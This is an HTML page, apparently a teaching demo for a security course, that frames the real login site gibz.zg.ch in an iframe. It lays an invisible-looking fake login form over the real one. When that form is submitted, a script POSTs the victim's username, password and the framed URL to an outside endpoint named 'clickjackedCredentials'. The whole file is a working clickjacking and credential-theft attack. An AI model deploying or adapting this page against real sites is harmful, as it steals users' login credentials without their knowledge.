<html>

<head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        html,
        body,
        iframe {
            position: absolute;
            width: 100%;
            height: 100%;

            padding: 0;
            margin: 0;

            border: none;
        }

        iframe {
            display: block;
        }

        #overlay {
            z-index: 1000;
            text-align: center;
            position: relative;
        }

        form {
            display: inline;
            margin-left: -388px;
            z-index: 1000;
        }

        #username,
        #password {
            position: absolute;

            width: 370px;
            padding: 3px;
        }

        #username {
            top: 230px;
        }

        #password {
            top: 280px;
        }

        #its_a_trap {
            position: absolute;
            top: 343px;
            padding: 2px 7px;
        }
    </style>
</head>

<body>
    <div id="overlay">
        <form id="dont_be_evil" method="POST" action="https://gibz.zg.ch/login/sls/auth?4497AA3D00E7=4e76b6fb8bdc5365f1f81635bd9709dd">
            <input id="username" type="text" name="userid">
            <input id="password" type="password" name="password">
            <input id="its_a_trap" type="submit" value="Anmelden">
        </form>
    </div>


    <iframe id="frame" src="https://gibz.zg.ch" name="test"></iframe>

    <script>
        document.getElementById("dont_be_evil").addEventListener("submit", function (e) {
            if (e.target && e.target.id == "dont_be_evil") {
                let user = {
                    source: document.getElementById("frame").src,
                    username: document.getElementById("username").value,
                    password: document.getElementById("password").value
                };

                fetch('https://m183.gibz-informatik.ch/api/clickjackedCredentials', {
                    method: 'POST',
                    mode: 'cors',
                    cache: 'no-cache',
                    credentials: 'same-origin',
                    headers: {
                        'Content-Type': "application/json"
                    },
                    redirect: 'follow',
                    referrer: 'no-referrer',
                    body: JSON.stringify(user)
                })
            }
        });
    </script>
</body>

</html>